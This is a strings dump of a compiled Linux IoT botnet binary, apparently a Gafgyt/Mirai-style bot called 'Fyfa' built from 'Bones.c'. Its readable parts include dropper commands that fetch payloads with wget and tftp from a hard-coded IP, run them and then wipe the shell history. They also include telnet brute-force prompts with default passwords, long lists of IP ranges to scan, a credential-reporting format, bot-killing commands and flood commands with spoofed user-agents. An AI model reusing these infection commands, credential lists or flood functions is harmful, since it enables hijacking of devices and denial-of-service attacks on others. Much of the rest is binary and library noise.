PTRh\
QVhNQ
VUUU
)9S_
<suM
<duJ
<xuJ
<XuJ
<uuG
<cuU
<ru3
L[^_]
[^_]
[^_]
L$$S
D$ S
L$$S
D$ S
UWVS
[^_]
UWVS
\$0e
[^_]
[^_]
T$ S
9S@t
K8u`
C<RRS
PPSj
t$(j
D$ P
D$$;D$ u
c9Y@t&
QPRS
t$$S
[^_]
UWVS
T$`~
@;D$,|
D$(%
UVPR
$VRP
;0u&
D$ P
QRPP
RRPS
u%Ph
u1P)
[^_]
%u!@
tR~P
tB~@=
UWVS
|$h~
:*u4
u3Q)
D$PPj
D$TP
D$l)
l[^_]
t@;C
UWVS
ZY[^_]
UWVS
D$gP
[^_]
UWVS
Z[^_]
|$HPh
RSQhz-
D$ P
D$ Ph
RRVj
PPVj
D$ Pj
RRVj
PPVj
RRVj	
PPVj	
D$ e
RRVj
PPVj
D$ Pj
D$<P
XZShD
D$,PS
UWVS
\$Th
D$8P
uO;-|
uG;t$
48#t$$
t$ #D$$
;L$(r"
D$8P
[^_]
[^_]
u99K
;U,tK
[^_]
UWVS
u:9z
QQPS)
[^_]
D$0 
D$(Pj
\$ S
D$,Ph
UWVS
G;<$|
XZKy
[^_]
UWVS
[^_]
Z[^_
UWVS
 <xu
(<`v
}3A9
t$$hdL
8cu"
0h/.
D$ =
[^_]
D$0u3e
D$,PPj
D$8PP
D$0Pj
SuMe
PPSh
UWVS
t@;D$|u
t+PPj/
u#Qj
HuHPhT
D$DP
D$ Pj
D$Ht
D$<P
D$ &2
D$$.2
D$HPj
Ph&2
\$LPj
;T$H
DD$L
D$<P
u)Pj
D$HPj
P[^_
D$(j
t$LW
RRPj
xOQQ
D$ %
3PPj
UWVS
D$D@PS
T$<:
T$41
|$<HG
T$4;l$
PPWS
T$<:
[^_]
t$Dj
D$<PR
t$(j
UWVS
;L$(
[^_]
9S@t
UWVS
[^_]
UWVS
<rtB<w
t;<af
[^_]
UWVS
wsQUWR
[^_]
[^_]
UWVS
[^_]
UWVS
 <au
u'z%
u?z=
|$-`
D$`p
D$hP5
)L$ 
T$(f
l$F1
D$8RP
D$(	
alula
D$(G
|$-`w
D$- 
|$-gu
|$-ft
0000
|$-gu
D$7f
D$lp
\$t|:
T$p)
|$-gt
|$-gu
|$7ftt
D$.x	
D$/+
D$/-
)|$$9
T$X~;
D$7g
[^_]
9S@t
K8um
9S@t
K8uN
C<;C
9S@t
K8uG
C<QS
Z %0
UWVS
t'9s@t
[^_]
UWVS
[^_]
QQWS
'RRWS
UWVS
.u5A
Z[^_]
UWVS
u*PP
t$|RVU
t$|j
t$hR
t$hj
D$ PWj
t$(S
L[^_]
UWVS
\$4u
t$8R
t$8S
[^_]
UWVS
D$(Q
|$01
[^_]
+q(e
t$|Q
FTX[^_
VHZ[^_
[^_]
9S@t
x:PW
[^_]
UWVS
 Ph\6
L$,9
T$,+t$
L$,)
L$,9
,[^_]
+0u-f
\$7S
<[^_]
UWVS
@hY6
;D$|v
"QQR
[^_]
UWVS
;T$(
u/;L$(
F;t$0
;|$(sQPS
[^_]
UWVS
9L$4s
L$81
D$<;
D$<f
T$ f
QQWU
L$<9
H9D$4}	
+\$@
D$dP
t$XU
D$$+D$@)
D$Dy
L$`Q
9T$D|
T$H;
[^_]
UWVS
u=PP
Php6
5QQ@k
t5PPh
tfPPj:U
uxRRh
\$$S
uXPPj.S
[^_]
t$4j
t$8j
t$hPU
t$hj
D$<Pj
@;D$4v
RRSV
T$T1
[^_]
\$_S
UWVS
\$(e
[^_]
t$|Q
PVWS
UWVS
u9QQ
u,QP
u,RP
D$ PW
[^_]
UWVS1
ZRRj.W
D$()
[^_]
198.204.228.178
cd /tmp; wget http://198.204.228.178/fyfaarm -O phone; chmod 777 phone; ./phone; rm -rf phone
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.204.228.178/fyfa.sh; chmod 777 fyfa.sh; sh fyfa.sh; tftp 198.204.228.178 -c get tfyfa.sh; chmod 777 tfyfa.sh; sh tfyfa.sh; tftp -r tfyfa2.sh -g 198.204.228.178; chmod 777 tfyfa2.sh; sh tfyfa2.sh; rm -rf fyfa.sh tfyfa.sh tfyfa2.sh; rm -rf *;history -c
cd /tmp;rm -rf fyfa*; busybox wget http://198.204.228.178/fyfa.sh; chmod 777 fyfa.sh; sh fyfa.sh;busybox tftp 198.204.228.178 -c get tfyfa.sh; chmod 777 tfyfa.sh; sh tfyfa.sh;busybox tftp -r tfyfa2.sh -g 198.204.228.178; chmod 777 tfyfa2.sh; sh tfyfa2.sh; rm -rf fyfa.sh tfyfa.sh tfyfa2.sh; rm -rf fyfa*
telnet
root
BusyBox
Linux
ogin
sername
assword
9615-cdp
nvalid
ailed
ncorrect
enied
rror
oodbye
ailure
mdm9625
/dev/netslink/
/tmp/
/var/
/dev/
/var/run/
/dev/shm/
/mnt/
/boot/
/usr/
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)
Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0
Opera/6.04 (Windows XP; U) [en]
Opera/9.99 (X11; U; sk)
Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)
Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
nwonknu
unknown
hello
slammed
Machines
Dank
Layer4
hhfdhkhbhcace
flood
ugiydg
IOHEDU9S
SIAHDIYSGBILC
DSFDD
DVAS
EFFAESF
uhdusaibxi
OIEDNBOUBAS
WQIJOIWENASO
pkpinasoubc
wubihbdc
inopxuob
wubiddsd
savduhvaU
UHyig732vgux
UByovoouds
saybuyyyywugav
sdjbciysvhdaocu
dsibciwveas
dsygc8y32723
tydjtr
tfkyt
rsyreg
HCKG
uibeiubf
YRXDJR
YIFUKT
YCJYRX
7TUFF
dsgdf
idsh
gffag
gfdag
fgadf
fbafdb
fbbbf
dfbdfb
fdbxb
BEDROLL
BEDSORE
BEETLED
BEETLES
BEHESTS
BEHOLDS
BENDERS
DELETES
DEBTORS
DUSTERS
ENSURED
EYELESS
EYELETS
HOLSTER
HUNTERS
LENDERS
HOTBEDS
LUSHEST
sudo
http
request
socket
create
Merry
holidays
vdeubhs
G8WGVSI
VUSAVXU
28H9UgBGvv
IYVkhj
uiVU
super
user
26736
18h3b2
kekd
wrecked
Unix
Strings
Manipulation
Command
Line
fyfa
edew
apt-get
ewdb
ubed
iyvugvjvkh
HBiug655
KJYDFyljf754
hbjhvihk
guygiuov
ugyi
iyfutvugjiu
hbivutfyrfvg
uivyuivug
khvihvgiug
jbihvbig
ubihkbvihyvigv
bivhkb
vejvbboqi
vobqre
odupubw
ftyduiy
hbilyfutdi
78tgyuhkbjg
tudiryxcvi
iygcduy
RTRTWFNJ
ghdugffytsdyt
tgerthgwtrwry
yteytietyue
qsortEQS
8969876hjkghblk
6mD4Q
Ck0Zt
6T1bg
joNuc
v9SNj
Fm74C
pXVcb
w472Y
vn6PH
Ycy7z
EraqpCtc
eQE9VqOO
A Santa lives evil at NASA
0I2tFegb
c9vSbX37
HzullcDD
sQT6GUpo
SE5iiTRL
8YnpVkqQ
P4ZFrN8y
ZaygGQWy
4b9hcI2E0ob
NbOwbHGP1sv
Hot98t9cA1C
SmosSnBu3UI
6LhO2mqIaG2
wFKTDkBE12q
wr5RiFwx0oe
bKJDMfvjRK2
CXaCtbYiETK
HRvlWcOcb8v
SozDWxWE2jAWgGv
LO53SCJbVwKjAta
M6qlcepTThrOhl3
s4VIALs5l0Murlt
eHj9MDyMU2PoJ32
aLQP6OWncMD8Pq7
1zoihgOpu92HLUz
wZU4i9GsFjT3DXt
8SqliubwCJDq9fg
NBLlKNISq52KJNr
uewbdih
wqodbpdwdqw
iqhdpuqhwb
close
keep-alive
accept
%s %s HTTP/1.1
Connection: %s
Accept: */*
User-Agent: %s
ping %s -s %s -i %s -w %s
busybox
Eleele
armv6
armv4
mips
mipsel
cock
fucknet
swatnet
botnet
dicknet
cracknet
weednet
ballnet
queernet
unet
yougay
gaynet
armv5l
armv6l
tftp
buff
i686
mips64
jackmeoff
sexy
briankrebs
sparc
powerpc-440fp
cunt
shit
kill -9 $(pidof %s)
kill -9 $(pidof busybox
history -c
kill -9 %s
(null)
/bin/sh
PING
gethostbyname
:>%$#
112.5.%d.%d
117.165.%d.%d
85.3.%d.%d
41.252.%d.%d
104.55.%d.%d
78.186.%d.%d
78.189.%d.%d
221.120.%d.%d
88.5.%d.%d
41.254.%d.%d
103.20.%d.%d
103.47.%d.%d
103.57.%d.%d
45.117.%d.%d
101.51.%d.%d
137.59.%d.%d
14.204.%d.%d
27.50.%d.%d
27.54.%d.%d
27.98.%d.%d
36.32.%d.%d
36.248.%d.%d
39.64.%d.%d
43.253.%d.%d
43.230.%d.%d
163.53.%d.%d
43.245.%d.%d
123.25.%d.%d
103.54.%d.%d
27.255.%d.%d
103.204.%d.%d
123.24.%d.%d
113.191.%d.%d
113.188.%d.%d
113.189.%d.%d
14.160.%d.%d
14.161.%d.%d
14.162.%d.%d
14.163.%d.%d
14.164.%d.%d
14.165.%d.%d
14.166.%d.%d
Borrow or rob
14.167.%d.%d
14.168.%d.%d
14.169.%d.%d
14.170.%d.%d
14.171.%d.%d
14.172.%d.%d
14.173.%d.%d
14.174.%d.%d
14.175.%d.%d
14.176.%d.%d
14.177.%d.%d
14.178.%d.%d
14.179.%d.%d
14.180.%d.%d
14.181.%d.%d
14.182.%d.%d
14.183.%d.%d
14.184.%d.%d
14.185.%d.%d
14.186.%d.%d
14.187.%d.%d
14.188.%d.%d
14.189.%d.%d
14.190.%d.%d
14.191.%d.%d
45.121.%d.%d
45.120.%d.%d
45.115.%d.%d
43.252.%d.%d
43.240.%d.%d
41.174.%d.%d
45.127.%d.%d
103.30.%d.%d
123.16.%d.%d
202.44.%d.%d
116.93.%d.%d
41.253.%d.%d
117.173.%d.%d
113.190.%d.%d
112.196.%d.%d
113.178.%d.%d
112.45.%d.%d
183.223.%d.%d
116.71.%d.%d
103.44.%d.%d
110.235.%d.%d
124.253.%d.%d
211.237.%d.%d
117.175.%d.%d
111.9.%d.%d
222.252.%d.%d
113.174.%d.%d
113.160.%d.%d
113.161.%d.%d
113.162.%d.%d
113.163.%d.%d
113.164.%d.%d
113.165.%d.%d
113.166.%d.%d
113.167.%d.%d
113.168.%d.%d
113.169.%d.%d
123.17.%d.%d
123.21.%d.%d
123.22.%d.%d
222.253.%d.%d
222.254.%d.%d
222.255.%d.%d
41.208.%d.%d
103.198.%d.%d
88.248.%d.%d
88.105.%d.%d
88.247.%d.%d
85.105.%d.%d
188.3.%d.%d
103.203.%d.%d
103.55.%d.%d
103.220.%d.%d
183.233.%d.%d
103.242.%d.%d
103.14.%d.%d
103.195.%d.%d
103.214.%d.%d
103.218.%d.%d
103.225.%d.%d
103.228.%d.%d
103.231.%d.%d
103.60.%d.%d
103.248.%d.%d
103.253.%d.%d
103.255.%d.%d
113.176.%d.%d
113.175.%d.%d
203.134.%d.%d
203.210.%d.%d
117.176.%d.%d
117.171.%d.%d
117.162.%d.%d
203.150.%d.%d
42.4.%d.%d
42.48.%d.%d
42.52.%d.%d
42.56.%d.%d
42.63.%d.%d
42.84.%d.%d
42.176.%d.%d
42.224.%d.%d
62.252.%d.%d
62.255.%d.%d
81.100.%d.%d
94.174.%d.%d
49.118.%d.%d
78.188.%d.%d
14.33.%d.%d
91.83.%d.%d
146.88.%d.%d
178.93.%d.%d
123.18.%d.%d
123.19.%d.%d
123.20.%d.%d
222.222.%d.%d
222.213.%d.%d
222.244.%d.%d
222.235.%d.%d
37.227.%d.%d
41.258.%d.%d
183.210.%d.%d
175.211.%d.%d
103.158.%d.%d
50.265.%d.%d
88.348.%d.%d
88.106.%d.%d
88.237.%d.%d
85.165.%d.%d
188.34.%d.%d
103.23.%d.%d
103.87.%d.%d
183.23.%d.%d
103.42.%d.%d
103.18.%d.%d
103.149.%d.%d
103.95.%d.%d
103.28.%d.%d
103.25.%d.%d
103.31.%d.%d
103.68.%d.%d
103.53.%d.%d
103.40.%d.%d
103.69.%d.%d
144.47.%d.%d
163.46.%d.%d
163.55.%d.%d
223.24.%d.%d
59.14.%d.%d
113.16.%d.%d
113.75.%d.%d
113.17.%d.%d
113.83.%d.%d
202.16.%d.%d
203.14.%d.%d
210.59.%d.%d
49.56.%d.%d
203.20.%d.%d
117.81.%d.%d
117.18.%d.%d
117.77.%d.%d
117.16.%d.%d
117.70.%d.%d
117.11.%d.%d
117.62.%d.%d
112.99.%d.%d
112.28.%d.%d
112.27.%d.%d
112.26.%d.%d
112.35.%d.%d
112.38.%d.%d
203.10.%d.%d
50.33.%d.%d
192.16.%d.%d
111.12.%d.%d
111.2.%d.%d
119.157.%d.%d
119.150.%d.%d
119.151.%d.%d
119.152.%d.%d
119.153.%d.%d
119.154.%d.%d
119.155.%d.%d
119.156.%d.%d
119.158.%d.%d
119.159.%d.%d
191.24.%d.%d
187.119.%d.%d
177.215.%d.%d
152.241.%d.%d
182.185.%d.%d
179.80.%d.%d
179.81.%d.%d
179.82.%d.%d
179.83.%d.%d
179.84.%d.%d
179.86.%d.%d
179.87.%d.%d
179.88.%d.%d
179.89.%d.%d
179.90.%d.%d
179.91.%d.%d
179.92.%d.%d
179.93.%d.%d
179.94.%d.%d
179.95.%d.%d
179.96.%d.%d
179.97.%d.%d
179.98.%d.%d
179.99.%d.%d
152.240.%d.%d
152.242.%d.%d
152.243.%d.%d
152.244.%d.%d
152.245.%d.%d
152.246.%d.%d
152.247.%d.%d
152.248.%d.%d
152.249.%d.%d
182.189.%d.%d
182.190.%d.%d
182.191.%d.%d
182.188.%d.%d
182.187.%d.%d
182.186.%d.%d
182.184.%d.%d
179.100.%d.%d
179.101.%d.%d
179.102.%d.%d
179.103.%d.%d
179.110.%d.%d
179.111.%d.%d
179.112.%d.%d
179.113.%d.%d
179.114.%d.%d
179.115.%d.%d
179.116.%d.%d
179.117.%d.%d
191.193.%d.%d
191.194.%d.%d
191.195.%d.%d
191.196.%d.%d
191.197.%d.%d
191.198.%d.%d
152.250.%d.%d
152.251.%d.%d
152.252.%d.%d
152.253.%d.%d
152.254.%d.%d
152.255.%d.%d
177.112.%d.%d
177.113.%d.%d
177.114.%d.%d
177.115.%d.%d
177.116.%d.%d
177.117.%d.%d
177.118.%d.%d
177.119.%d.%d
177.120.%d.%d
177.121.%d.%d
177.138.%d.%d
177.139.%d.%d
177.144.%d.%d
177.145.%d.%d
177.146.%d.%d
177.147.%d.%d
177.160.%d.%d
177.161.%d.%d
177.162.%d.%d
177.163.%d.%d
177.168.%d.%d
177.169.%d.%d
177.170.%d.%d
177.171.%d.%d
177.172.%d.%d
189.96.%d.%d
189.97.%d.%d
189.98.%d.%d
189.99.%d.%d
39.34.%d.%d
59.103.%d.%d
191.12.%d.%d
186.117.%d.%d
179.131.%d.%d
179.129.%d.%d
179.170.%d.%d
191.206.%d.%d
187.118.%d.%d
187.116.%d.%d
179.224.%d.%d
179.166.%d.%d
%d.%d.%d.%d
[0;36mLogin found:
[0;31m%s 
[37m| 
[0;35mUsername:
[0;31m%s 
[37m| 
[0;35mPassword:
[0;31m%s 
[37m| 
[37m
REPORT %s:%s:%s
shell
admin
[0;35mLogin found:
[0;31m%s 
[37m| 
[0;35mUsername:
[0;31madmin 
[37m| 
[0;35mPassword:
[0;31madmin 
[37m| 
[37m
REPORT %s:admin:admin
oelinux123
PONG!
GETLOCALIP
My IP: %s
BOTKILL
Killing Bots
SCANNER
SCANNER ON | OFF
 OFF
PHONE
PHONE ON | OFF
ICMP
HTTP
RANGE
RANGE <option 0-idk>
Range %d->%d
STOP
HOODASSSHIT
8.8.8.8
/proc/net/route
	00000000	
x86_32
PYTHON
NETIS
SERVER
Cheats
/usr/bin/python
sshd
/usr/sbin/dropbear
Fyfa
[0;32m[ %s ]
[0;37m ~ IP:
[0;32m%s 
[0;37m~ Type:
[0;32m%s
[0;37m:
[0;32m%s
PONG
MOVE
%s 2>&1
(nil)
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
%s%s%s
Error 0
Unknown host
Host name lookup failure
Unknown server error
Tacocat
No address associated with name
Resolver error
?/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
/bin/sh
exit 0
L(knN
 Aset_thread_area failed when setting up thread-local storage
0123456789abcdef
/etc/resolv.conf
nameserver
domain
search
options
timeout
attempts
/etc/hosts
CAk[S
libpthread/nptl/sysdeps/unix/sysv/linux/close.S
__libc_close
int:t(0,1)=r(0,1);-2147483648;2147483647;
__libc_close:F(0,1)
__libc_open
__libc_open:F(0,1)
__libc_write
__libc_write:F(0,1)
__libc_read
__libc_read:F(0,1)
__waitpid
__waitpid:F(0,1)
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
Beeb
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
GCC: (GNU) 4.2.1
.symtab
.strtab
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.tbss
.ctors
.dtors
.jcr
.got.plt
.data
.bss
.stab
.stabstr
.comment
crtstuff.c
__CTOR_LIST__
__DTOR_LIST__
__EH_FRAME_BEGIN__
__JCR_LIST__
__do_global_dtors_aux
completed.4963
p.4961
frame_dummy
object.4975
__CTOR_END__
__DTOR_END__
__FRAME_END__
__JCR_END__
__do_global_ctors_aux
initfini.c
Bones.c
C.2.4849
C.0.4834
C.6.4892
C.10.4988
i.5040
printchar
prints
printi
print
fdopen_pids
hextable
ipState
__syscall_fcntl.c
_exit.c
access.c
chdir.c
dup2.c
getdtablesize.c
geteuid.c
getrlimit.c
ioctl.c
kill.c
pipe.c
prctl.c
select.c
__syscall_select
setsid.c
sigprocmask.c
time.c
isspace.c
toupper.c
__C_ctype_b.c
__C_ctype_b_data
__C_ctype_toupper.c
__C_ctype_toupper_data
errno.c
__errno_location.c
puts.c
_L_lock_18
_L_unlock_59
sprintf.c
vsnprintf.c
_stdio.c
_stdio_streams
_fixed_buffers
_wcommit.c
_vfprintf_internal.c
_charpad
_fp_out_narrow
spec_base.6615
prefix.6616
_ppfs_init.c
_ppfs_prepargs.c
_ppfs_setargs.c
_ppfs_parsespec.c
_promoted_size
type_codes
type_sizes
spec_flags.6620
qual_chars.6625
spec_chars.6621
spec_ranges.6622
spec_or_mask.6623
spec_and_mask.6624
_bss_custom_printf_spec
fputc_unlocked.c
fputs_unlocked.c
fwrite_unlocked.c
memcpy.c
memset.c
strchr.c
strcmp.c
strcpy.c
strlen.c
strncpy.c
strnlen.c
strstr.c
__glibc_strerror_r.c
__xpg_strerror_r.c
unknown.1636
_string_syserrmsgs.c
bcopy.c
bzero.c
strcasestr.c
strtok.c
next_start.1613
isatty.c
tcgetattr.c
ntohl.c
herror.c
error_msg
h_errlist
colon_space.4870
inet_ntoa.c
buf.4724
inet_makeaddr.c
gethostbyname.c
gethostbyname2.c
buf.6861
hoste.6860
connect.c
getsockname.c
getsockopt.c
recv.c
send.c
sendto.c
setsockopt.c
socket.c
sigaddset.c
sigempty.c
signal.c
sigsetops.c
malloc.c
__malloc_largebin_index
free.c
__malloc_trim
abort.c
mylock
been_there_done_that
rand.c
random.c
unsafe_state
randtbl
random_r.c
random_poly_info
atol.c
strtol.c
_stdlib_strto_l.c
exit.c
execl.c
sysconf.c
nprocessors_onln
fork.c
_L_lock_70
_L_unlock_167
register-atfork.c
_L_lock_28
fork_handler_pool
_L_unlock_93
getpid.c
raise.c
sleep.c
pseudo_cancel
SAVEBX1
RESTBX1
pseudo_end
PUSHBX1
POPBX1
libc-cancellation.c
__uClibc_main.c
__pthread_return_0
__check_one_fd
system.c
cancel_handler
lock
_L_lock_30
sa_refcntr
quit
intr
_L_unlock_52
do_system
_L_lock_74
_L_unlock_113
_L_lock_129
_L_unlock_158
_L_lock_288
_L_unlock_328
__syscall_error.c
sigaction.c
__restore_rt
__restore
__socketcall.c
__syscall_rt_sigaction.c
execve.c
getegid.c
getgid.c
getpagesize.c
getuid.c
munmap.c
nanosleep.c
__syscall_nanosleep
sbrk.c
